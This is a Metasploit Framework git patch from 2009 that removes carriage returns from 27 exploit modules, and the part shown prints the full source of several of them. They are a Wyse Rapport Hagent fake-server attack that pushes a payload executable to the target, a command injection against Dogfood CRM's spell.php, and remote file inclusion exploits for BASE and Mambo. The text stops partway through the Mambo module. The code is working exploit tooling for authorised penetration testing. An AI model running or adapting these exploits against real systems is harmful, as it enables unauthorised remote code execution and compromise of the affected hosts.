From 2570fcee157af2fac9eef93dc79c17384f1baf78 Mon Sep 17 00:00:00 2001
From: James Lee <James_Lee@rapid7.com>
Date: Tue, 15 Dec 2009 18:47:29 +0000
Subject: [PATCH] get rid of some more ^Ms

git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../multi/wyse/hagent_untrusted_hsdata.rb     | 472 ++++++-------
 .../exploits/unix/webapp/base_qry_common.rb   | 142 ++--
 .../unix/webapp/dogfood_spell_exec.rb         | 192 +++---
 .../exploits/unix/webapp/mambo_cache_lite.rb  | 144 ++--
 .../windows/browser/aol_ampx_convertfile.rb   | 236 +++----
 .../windows/browser/autodesk_idrop.rb         | 262 ++++----
 .../ebook_flipviewer_fviewerloading.rb        | 226 +++----
 .../windows/browser/ie_createobject.rb        |   8 +-
 .../browser/ms_visual_studio_msmask.rb        | 242 +++----
 .../windows/browser/owc_spreadsheet_msdso.rb  | 264 ++++----
 .../windows/browser/roxio_cineplayer.rb       | 218 +++---
 .../browser/sapgui_saveviewtosessionfile.rb   | 230 +++----
 .../windows/browser/verypdf_pdfview.rb        | 226 +++----
 .../windows/browser/winzip_fileview.rb        | 246 +++----
 .../exploits/windows/ftp/dreamftp_format.rb   | 166 ++---
 .../windows/ftp/filecopa_list_overflow.rb     | 108 +--
 .../exploits/windows/games/mohaa_getinfo.rb   | 192 +++---
 .../windows/http/ca_igateway_debug.rb         | 176 ++---
 .../http/efs_easychatserver_username.rb       | 178 ++---
 .../windows/http/psoproxy91_overflow.rb       | 174 ++---
 .../lotus/domino_http_accept_language.rb      | 320 ++++-----
 .../windows/misc/asus_dpcproxy_overflow.rb    | 142 ++--
 .../exploits/windows/misc/sap_2005_license.rb | 154 ++---
 .../windows/misc/tiny_identd_overflow.rb      | 142 ++--
 .../windows/smb/smb2_negotiate_func_index.rb  | 628 +++++++++---------
 .../windows/telnet/gamsoft_telsrv_username.rb | 232 +++----
 .../windows/tftp/dlink_long_filename.rb       | 172 ++---
 27 files changed, 2949 insertions(+), 2943 deletions(-)

diff --git a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb
index a69582e094..91c110441a 100644
--- a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb
+++ b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb
@@ -1,239 +1,239 @@
-##
-# $Id: hagent_untrusted_hsdata.rb
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/projects/Framework/
-##
-
-require 'timeout'
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
+##
+# $Id: hagent_untrusted_hsdata.rb
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'timeout'
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
-	include Msf::Exploit::Remote::Tcp
-	include Msf::Exploit::Remote::FtpServer
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'Wyse Rapport Hagent Fake Hserver Command Execution',
-			'Description'    => %q{
-				This module exploits the Wyse Rapport Hagent service by pretending to
-			be a legitimate server. This process involves starting both HTTP and
-			FTP services on the attacker side, then contacting the Hagent service of
-			the target and indicating that an update is available. The target will
-			then download the payload wrapped in an executable from the FTP service.
-			},
-			'Stance'         => Msf::Exploit::Stance::Aggressive,
-			'Author'         => 'kf',
-			'Version'        => '$Revision$',
-			'References'     =>
-				[
-					['CVE', '2009-0695'],
-					['OSVDB', '55839'],
-					['US-CERT-VU', '654545'],
-					['URL', 'http://snosoft.blogspot.com/'],
-					['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'],
-					['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'],
-					['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'],
-				],
-			'Payload'        =>
-				{
-					'Space'    => 2048,
-					'BadChars' => '',
-				},
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'process',
-				},
-			'Targets'        =>
-					[
-						[ 'Windows XPe x86',{'Platform' => 'win',}],
-						[ 'Wyse Linux x86', {'Platform' => 'linux',}],
-					],
-			'DefaultTarget'  => 0,
-			'Privileged'     => true
-		))
-
-		register_options([
-			OptPort.new('SRVPORT',    [ true, "The local port to use for the FTP server", 21 ]),
-			Opt::RPORT(80),
-		], self.class)
-	end
-
-
-	def exploit
-
-		if(datastore['SRVPORT'].to_i != 21)
-			print_error("This exploit requires the FTP service to run on port 21")
-			return
-		end
-
-		# Connect to the target service
-		print_status("Connecting to the target")
-		connect()
-
-		# Start the FTP service
-		print_status("Starting the FTP server")
-		start_service()
-
-		# Create the executable with our payload
-		print_status("Generating the EXE")
-		if target['Platform'] == 'win'
-			@exe_file = Msf::Util::EXE.to_win32pe(framework, payload.encoded)
-			maldir      = "C:\\"  		# Windows
-			malfile     = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".exe"
-			co = "XP"
-		elsif  target['Platform'] == 'linux'
-			@exe_file = Msf::Util::EXE.to_linux_x86_elf(framework, payload.encoded)
-			maldir      = "//tmp//"		# Linux
-			malfile     = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".bin"
-			co = "LXS"
-		end
-		@exe_sent = false
-
-		# Start the HTTP service
-		print_status("Starting the HTTP service")
-		wdmserver  = Rex::Socket::TcpServer.create({
-			'Context'   => {
-				'Msf'        => framework,
-				'MsfExploit' => self
-			}
-		})
-
-		wdmserver_port = wdmserver.getsockname[2]
-		print_status("Starting the HTTP service on port #{wdmserver_port}")
-
-
-		fakerapport = Rex::Socket.source_address(rhost)
-		fakemac     = "00" + Rex::Text.rand_text(5).unpack("H*")[0]
-		mal = "&V54&CI=3|MAC=#{fakemac}|IP=#{rhost}MT=3|HS=#{fakerapport}|PO=#{wdmserver_port}|"
-
-		# FTP Credentials
-		ftpserver = Rex::Socket.source_address(rhost)
-		ftpuser   = Rex::Text.rand_text_alphanumeric(rand(8)+1)
-		ftppass   = Rex::Text.rand_text_alphanumeric(rand(8)+1)
-		ftpport   = 21
-		ftpsecure = '0'
-
-		incr = 10
-		pwn1 =
-		"&UP0|&SI=1|UR=9" +
-		"|CO \x0f#{co}\x0f|#{incr}" +
-		# "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" +
-		"|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}"
-
-		pwn2 =
-	 	"|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}"
-
-		pwn3 =
-		"|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
-		# "|RB|#{incr+1}" +
-		# "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" +
-		#"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
-		# FTP Paramaters
-		"|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" + "|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" +
-		"|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" + "|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" +
-		# No clue
-		"|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|"
-
-		if target['Platform'] == 'win'
-			pwn = pwn1 + pwn3
-		elsif target['Platform'] == 'linux'
-			pwn = pwn1 + pwn2 + pwn3
-		end
-		# Send the malicious request
-		sock.put(mal)
-
-		# Download some response data
-		resp = sock.get_once(-1, 10)
-		print_status("Received: " + resp)
-
-		print_status("Waiting on a connection to the HTTP service")
-		begin
-			Timeout.timeout(190) do
-			done = false
-			while (not done and session = wdmserver.accept)
-				req = session.recvfrom(2000)[0]
-				next if not req
-				next if req.empty?
-				print_status("HTTP Request: #{req.split("\n")[0].strip}")
-
-				case req
-  				when /V01/
-		   	 		print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)")
-					res = pwn
-				when /V02/
-					print_status("++ device sending V02 query...")
-					res  = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|"
-					done = true
-
-  				when /V55/
-		  	 		print_status("++ device sending V55 query...")
-					res = pwn
-  				when /POST/  # PUT is used for non encrypted requests.
-		  	 		print_status("++ device sending V55 query...")
-					res = pwn
-					done = true
-				else
-					print_status("+++ sending generic response...")
-					res = pwn
-				end
-
-				print_status("Sending reply: #{res}")
-				session.put(res)
-  				session.close
-			end
-			end
-		rescue ::Timeout::Error
-			print_status("Timed out waiting on the HTTP request")
-			wdmserver.close
-			disconnect()
-			stop_service()
-			return
-		end
-
-		print_status("Waiting on the FTP request...")
-		stime = Time.now.to_f
-		while(not @exe_sent)
-			break if (stime + 90 < Time.now.to_f)
-			select(nil, nil, nil, 0.25)
-		end
-
-		if(not @exe_sent)
-			print_status("No executable sent :(")
-		end
-
-		stop_service()
-		wdmserver.close()
-
-		handler
-		disconnect
-	end
-
-	def on_client_command_retr(c,arg)
-		print_status("#{@state[c][:name]} FTP download request for #{arg}")
-		conn = establish_data_connection(c)
-		if(not conn)
-			c.put("425 Can't build data connection\r\n")
-			return
-		end
-
-		c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
-		conn.put(@exe_file)
-		c.put("226 Transfer complete.\r\n")
-		conn.close
-		@exe_sent = true
-	end
-
-	def on_client_command_size(c,arg)
-		print_status("#{@state[c][:name]} FTP size request for #{arg}")
-		c.put("213 #{@exe_file.length}\r\n")
-	end
-
-
+	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::Remote::FtpServer
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Wyse Rapport Hagent Fake Hserver Command Execution',
+			'Description'    => %q{
+				This module exploits the Wyse Rapport Hagent service by pretending to
+			be a legitimate server. This process involves starting both HTTP and
+			FTP services on the attacker side, then contacting the Hagent service of
+			the target and indicating that an update is available. The target will
+			then download the payload wrapped in an executable from the FTP service.
+			},
+			'Stance'         => Msf::Exploit::Stance::Aggressive,
+			'Author'         => 'kf',
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					['CVE', '2009-0695'],
+					['OSVDB', '55839'],
+					['US-CERT-VU', '654545'],
+					['URL', 'http://snosoft.blogspot.com/'],
+					['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'],
+					['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'],
+					['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'],
+				],
+			'Payload'        =>
+				{
+					'Space'    => 2048,
+					'BadChars' => '',
+				},
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Targets'        =>
+					[
+						[ 'Windows XPe x86',{'Platform' => 'win',}],
+						[ 'Wyse Linux x86', {'Platform' => 'linux',}],
+					],
+			'DefaultTarget'  => 0,
+			'Privileged'     => true
+		))
+
+		register_options([
+			OptPort.new('SRVPORT',    [ true, "The local port to use for the FTP server", 21 ]),
+			Opt::RPORT(80),
+		], self.class)
+	end
+
+
+	def exploit
+
+		if(datastore['SRVPORT'].to_i != 21)
+			print_error("This exploit requires the FTP service to run on port 21")
+			return
+		end
+
+		# Connect to the target service
+		print_status("Connecting to the target")
+		connect()
+
+		# Start the FTP service
+		print_status("Starting the FTP server")
+		start_service()
+
+		# Create the executable with our payload
+		print_status("Generating the EXE")
+		if target['Platform'] == 'win'
+			@exe_file = Msf::Util::EXE.to_win32pe(framework, payload.encoded)
+			maldir      = "C:\\"  		# Windows
+			malfile     = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".exe"
+			co = "XP"
+		elsif  target['Platform'] == 'linux'
+			@exe_file = Msf::Util::EXE.to_linux_x86_elf(framework, payload.encoded)
+			maldir      = "//tmp//"		# Linux
+			malfile     = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".bin"
+			co = "LXS"
+		end
+		@exe_sent = false
+
+		# Start the HTTP service
+		print_status("Starting the HTTP service")
+		wdmserver  = Rex::Socket::TcpServer.create({
+			'Context'   => {
+				'Msf'        => framework,
+				'MsfExploit' => self
+			}
+		})
+
+		wdmserver_port = wdmserver.getsockname[2]
+		print_status("Starting the HTTP service on port #{wdmserver_port}")
+
+
+		fakerapport = Rex::Socket.source_address(rhost)
+		fakemac     = "00" + Rex::Text.rand_text(5).unpack("H*")[0]
+		mal = "&V54&CI=3|MAC=#{fakemac}|IP=#{rhost}MT=3|HS=#{fakerapport}|PO=#{wdmserver_port}|"
+
+		# FTP Credentials
+		ftpserver = Rex::Socket.source_address(rhost)
+		ftpuser   = Rex::Text.rand_text_alphanumeric(rand(8)+1)
+		ftppass   = Rex::Text.rand_text_alphanumeric(rand(8)+1)
+		ftpport   = 21
+		ftpsecure = '0'
+
+		incr = 10
+		pwn1 =
+		"&UP0|&SI=1|UR=9" +
+		"|CO \x0f#{co}\x0f|#{incr}" +
+		# "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" +
+		"|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}"
+
+		pwn2 =
+	 	"|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}"
+
+		pwn3 =
+		"|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
+		# "|RB|#{incr+1}" +
+		# "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" +
+		#"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
+		# FTP Paramaters
+		"|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" + "|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" +
+		"|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" + "|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" +
+		# No clue
+		"|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|"
+
+		if target['Platform'] == 'win'
+			pwn = pwn1 + pwn3
+		elsif target['Platform'] == 'linux'
+			pwn = pwn1 + pwn2 + pwn3
+		end
+		# Send the malicious request
+		sock.put(mal)
+
+		# Download some response data
+		resp = sock.get_once(-1, 10)
+		print_status("Received: " + resp)
+
+		print_status("Waiting on a connection to the HTTP service")
+		begin
+			Timeout.timeout(190) do
+			done = false
+			while (not done and session = wdmserver.accept)
+				req = session.recvfrom(2000)[0]
+				next if not req
+				next if req.empty?
+				print_status("HTTP Request: #{req.split("\n")[0].strip}")
+
+				case req
+  				when /V01/
+		   	 		print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)")
+					res = pwn
+				when /V02/
+					print_status("++ device sending V02 query...")
+					res  = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|"
+					done = true
+
+  				when /V55/
+		  	 		print_status("++ device sending V55 query...")
+					res = pwn
+  				when /POST/  # PUT is used for non encrypted requests.
+		  	 		print_status("++ device sending V55 query...")
+					res = pwn
+					done = true
+				else
+					print_status("+++ sending generic response...")
+					res = pwn
+				end
+
+				print_status("Sending reply: #{res}")
+				session.put(res)
+  				session.close
+			end
+			end
+		rescue ::Timeout::Error
+			print_status("Timed out waiting on the HTTP request")
+			wdmserver.close
+			disconnect()
+			stop_service()
+			return
+		end
+
+		print_status("Waiting on the FTP request...")
+		stime = Time.now.to_f
+		while(not @exe_sent)
+			break if (stime + 90 < Time.now.to_f)
+			select(nil, nil, nil, 0.25)
+		end
+
+		if(not @exe_sent)
+			print_status("No executable sent :(")
+		end
+
+		stop_service()
+		wdmserver.close()
+
+		handler
+		disconnect
+	end
+
+	def on_client_command_retr(c,arg)
+		print_status("#{@state[c][:name]} FTP download request for #{arg}")
+		conn = establish_data_connection(c)
+		if(not conn)
+			c.put("425 Can't build data connection\r\n")
+			return
+		end
+
+		c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
+		conn.put(@exe_file)
+		c.put("226 Transfer complete.\r\n")
+		conn.close
+		@exe_sent = true
+	end
+
+	def on_client_command_size(c,arg)
+		print_status("#{@state[c][:name]} FTP size request for #{arg}")
+		c.put("213 #{@exe_file.length}\r\n")
+	end
+
+
 end
 
diff --git a/modules/exploits/unix/webapp/base_qry_common.rb b/modules/exploits/unix/webapp/base_qry_common.rb
index a27d285a2a..7900c80621 100644
--- a/modules/exploits/unix/webapp/base_qry_common.rb
+++ b/modules/exploits/unix/webapp/base_qry_common.rb
@@ -1,72 +1,72 @@
-##
-# This file is part of the Metasploit Framework and may be subject to 
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/projects/Framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
-
-	include Msf::Exploit::Remote::Tcp
-	include Msf::Exploit::Remote::HttpClient
-	include Msf::Exploit::Remote::HttpServer::PHPInclude
-
-	def initialize(info = {})
-		super(update_info(info,	
-			'Name'           => 'BASE base_qry_common Remote File Include.',
-			'Description'    => %q{
-					This module exploits a remote file inclusion vulnerability in
-					the base_qry_common.php file in BASE 1.2.4 and earlier.
-			},
-			'Author'         => [ 'MC' ],
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision$',
-			'References'     =>
-				[
-					[ 'CVE', '2006-2685' ],
-					[ 'BID', '18298' ],
-				],
-			'Privileged'     => false,
-			'Payload'        =>
-				{
-					'DisableNops' => true,
-					'Compat'      => 
-						{
-							'ConnectionType' => 'find',
-						},
-					'Space'       => 32768,
-				},
-			'Platform'       => 'php',
-			'Arch'           => ARCH_PHP,
-			'Targets'        => [[ 'Automatic', { }]],
-			'DisclosureDate' => 'Jun 14 2008',
-			'DefaultTarget' => 0))
-			
-			register_options(
-				[
-					OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/base/base_qry_common.php?BASE_path=!URL!"]),
-				], self.class)
-	end
-
-	def php_exploit
-
-		timeout = 0.01
-		uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
-		print_status("Trying uri #{uri}")
-
-		response = send_request_raw( {
-				'global' => true,
-				'uri' => uri,
-			},timeout)
-
-		if response and response.code != 200
-			print_error("Server returned non-200 status code (#{response.code})")
-		end
-		
-		handler
-	end
-
-end
+
+	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::Remote::HttpServer::PHPInclude
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'BASE base_qry_common Remote File Include.',
+			'Description'    => %q{
+					This module exploits a remote file inclusion vulnerability in
+					the base_qry_common.php file in BASE 1.2.4 and earlier.
+			},
+			'Author'         => [ 'MC' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'CVE', '2006-2685' ],
+					[ 'BID', '18298' ],
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'DisableNops' => true,
+					'Compat'      => 
+						{
+							'ConnectionType' => 'find',
+						},
+					'Space'       => 32768,
+				},
+			'Platform'       => 'php',
+			'Arch'           => ARCH_PHP,
+			'Targets'        => [[ 'Automatic', { }]],
+			'DisclosureDate' => 'Jun 14 2008',
+			'DefaultTarget' => 0))
+			
+			register_options(
+				[
+					OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/base/base_qry_common.php?BASE_path=!URL!"]),
+				], self.class)
+	end
+
+	def php_exploit
+
+		timeout = 0.01
+		uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
+		print_status("Trying uri #{uri}")
+
+		response = send_request_raw( {
+				'global' => true,
+				'uri' => uri,
+			},timeout)
+
+		if response and response.code != 200
+			print_error("Server returned non-200 status code (#{response.code})")
+		end
+		
+		handler
+	end
+
+end
diff --git a/modules/exploits/unix/webapp/dogfood_spell_exec.rb b/modules/exploits/unix/webapp/dogfood_spell_exec.rb
index 04e25a3702..0c7484921c 100644
--- a/modules/exploits/unix/webapp/dogfood_spell_exec.rb
+++ b/modules/exploits/unix/webapp/dogfood_spell_exec.rb
@@ -1,97 +1,97 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to 
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-
-require 'msf/core'
-
-
-class Metasploit3 < Msf::Exploit::Remote
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
-
-	include Msf::Exploit::Remote::HttpClient
-
-	def initialize(info = {})
-		super(update_info(info,	
-			'Name'           => 'Dogfood CRM spell.php Remote Command Execution',
-			'Description'    => %q{
-				This module exploits a previously unpublished vulnerability in the
-				Dogfood CRM mail function which is vulnerable to command injection
-				in the spell check feature.  Because of character restrictions, this
-				exploit works best with the double-reverse telnet payload. This
-				vulnerability was discovered by LSO and affects v2.0.10.
-			},
-			'Author'         => 	[
-							'LSO <lso@hushmail.com>', # Exploit module
-							'patrick', # Added check code, QA tested ok 20090303, there are no references (yet).
-						],
-			'License'        => BSD_LICENSE,
-			'Version'        => '$Revision$',
-			'References'     => 
-				[
-					[ 'OSVDB', '54707' ],
-					[ "URL", "http://downloads.sourceforge.net/dogfood/" ],
-				],
-			'Privileged'     => false,
-			'Platform'       => ['unix'], # patrickw - removed win, linux -> untested
-			'Arch'           => ARCH_CMD,
-			'Payload'        => 
-				{
-					'Space'       => 1024,
-					'DisableNops' => true,
-					'BadChars'    => %q|'"`|,  # quotes are escaped by PHP's magic_quotes_gpc in a default install
-					'Compat'      =>
-						{
-							'PayloadType' => 'cmd',
-							'RequiredCmd' => 'generic perl ruby bash telnet',
-						}
-				},
-			'Targets'        => [ ['Automatic', { }], ],
-			'DefaultTarget' => 0
-			))
-
-		register_options(
-			[
-				OptString.new('URIPATH',   [ true,  "The URI of the spell checker", '/dogfood/mail/spell.php']),
-			], self.class)
-
-	end
-
-	def check
-		res = send_request_raw(
-			{
-				'uri' => datastore['URIPATH'],
-			}, 1)
-			
-		if (res.body =~ /Spell Check complete/)
-			return Exploit::CheckCode::Detected
-		end
-		return Exploit::CheckCode::Safe
-	end
-
-	def exploit
-		timeout = 1
-
-		cmd = payload.encoded
-		data = "data=#{Rex::Text.uri_encode('$( '+ cmd + ' &)x')}"
-		uri = datastore['URIPATH'] 
-
-		response = send_request_cgi(
-			{ 
-			'uri' => uri, 
-			'method' => "POST",
-			'data' => data 
-			},
-		timeout)
-
-		handler
-	end
-end
-
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'Dogfood CRM spell.php Remote Command Execution',
+			'Description'    => %q{
+				This module exploits a previously unpublished vulnerability in the
+				Dogfood CRM mail function which is vulnerable to command injection
+				in the spell check feature.  Because of character restrictions, this
+				exploit works best with the double-reverse telnet payload. This
+				vulnerability was discovered by LSO and affects v2.0.10.
+			},
+			'Author'         => 	[
+							'LSO <lso@hushmail.com>', # Exploit module
+							'patrick', # Added check code, QA tested ok 20090303, there are no references (yet).
+						],
+			'License'        => BSD_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     => 
+				[
+					[ 'OSVDB', '54707' ],
+					[ "URL", "http://downloads.sourceforge.net/dogfood/" ],
+				],
+			'Privileged'     => false,
+			'Platform'       => ['unix'], # patrickw - removed win, linux -> untested
+			'Arch'           => ARCH_CMD,
+			'Payload'        => 
+				{
+					'Space'       => 1024,
+					'DisableNops' => true,
+					'BadChars'    => %q|'"`|,  # quotes are escaped by PHP's magic_quotes_gpc in a default install
+					'Compat'      =>
+						{
+							'PayloadType' => 'cmd',
+							'RequiredCmd' => 'generic perl ruby bash telnet',
+						}
+				},
+			'Targets'        => [ ['Automatic', { }], ],
+			'DefaultTarget' => 0
+			))
+
+		register_options(
+			[
+				OptString.new('URIPATH',   [ true,  "The URI of the spell checker", '/dogfood/mail/spell.php']),
+			], self.class)
+
+	end
+
+	def check
+		res = send_request_raw(
+			{
+				'uri' => datastore['URIPATH'],
+			}, 1)
+			
+		if (res.body =~ /Spell Check complete/)
+			return Exploit::CheckCode::Detected
+		end
+		return Exploit::CheckCode::Safe
+	end
+
+	def exploit
+		timeout = 1
+
+		cmd = payload.encoded
+		data = "data=#{Rex::Text.uri_encode('$( '+ cmd + ' &)x')}"
+		uri = datastore['URIPATH'] 
+
+		response = send_request_cgi(
+			{ 
+			'uri' => uri, 
+			'method' => "POST",
+			'data' => data 
+			},
+		timeout)
+
+		handler
+	end
+end
+
diff --git a/modules/exploits/unix/webapp/mambo_cache_lite.rb b/modules/exploits/unix/webapp/mambo_cache_lite.rb
index a8acdf9be4..a7c1c450f7 100644
--- a/modules/exploits/unix/webapp/mambo_cache_lite.rb
+++ b/modules/exploits/unix/webapp/mambo_cache_lite.rb
@@ -1,73 +1,73 @@
-##
-# This file is part of the Metasploit Framework and may be subject to 
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/projects/Framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
-
-	include Msf::Exploit::Remote::Tcp
-	include Msf::Exploit::Remote::HttpClient
-	include Msf::Exploit::Remote::HttpServer::PHPInclude
-
-	def initialize(info = {})
-		super(update_info(info,	
-			'Name'           => 'Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include.',
-			'Description'    => %q{
-					This module exploits a remote file inclusion vulnerability in
-					includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo 
-					4.6.4 and earlier.
-			},
-			'Author'         => [ 'MC' ],
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision$',
-			'References'     =>
-				[
-					[ 'CVE', '2008-2905' ],
-					[ 'BID', '29716' ],
-				],
-			'Privileged'     => false,
-			'Payload'        =>
-				{
-					'DisableNops' => true,
-					'Compat'      => 
-						{
-							'ConnectionType' => 'find',
-						},
-					'Space'       => 32768,
-				},
-			'Platform'       => 'php',
-			'Arch'           => ARCH_PHP,
-			'Targets'        => [[ 'Automatic', { }]],
-			'DisclosureDate' => 'Jun 14 2008',
-			'DefaultTarget' => 0))
-			
-			register_options(
-				[
-					OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/includes/Cache/Lite/Output.php?mosConfig_absolute_path=!URL!"]),
-				], self.class)
-	end
-
-	def php_exploit
-
-		timeout = 0.01
-		uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
-		print_status("Trying uri #{uri}")
-
-		response = send_request_raw( {
-				'global' => true,
-				'uri' => uri,
-			},timeout)
-
-		if response and response.code != 200
-			print_error("Server returned non-200 status code (#{response.code})")
-		end
-		
-		handler
-	end
-
-end
+
+	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::Remote::HttpServer::PHPInclude
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include.',
+			'Description'    => %q{
+					This module exploits a remote file inclusion vulnerability in
+					includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo 
+					4.6.4 and earlier.
+			},
+			'Author'         => [ 'MC' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'CVE', '2008-2905' ],
+					[ 'BID', '29716' ],
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'DisableNops' => true,
+					'Compat'      => 
+						{
+							'ConnectionType' => 'find',
+						},
+					'Space'       => 32768,
+				},
+			'Platform'       => 'php',
+			'Arch'           => ARCH_PHP,
+			'Targets'        => [[ 'Automatic', { }]],
+			'DisclosureDate' => 'Jun 14 2008',
+			'DefaultTarget' => 0))
+			
+			register_options(
+				[
+					OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/includes/Cache/Lite/Output.php?mosConfig_absolute_path=!URL!"]),
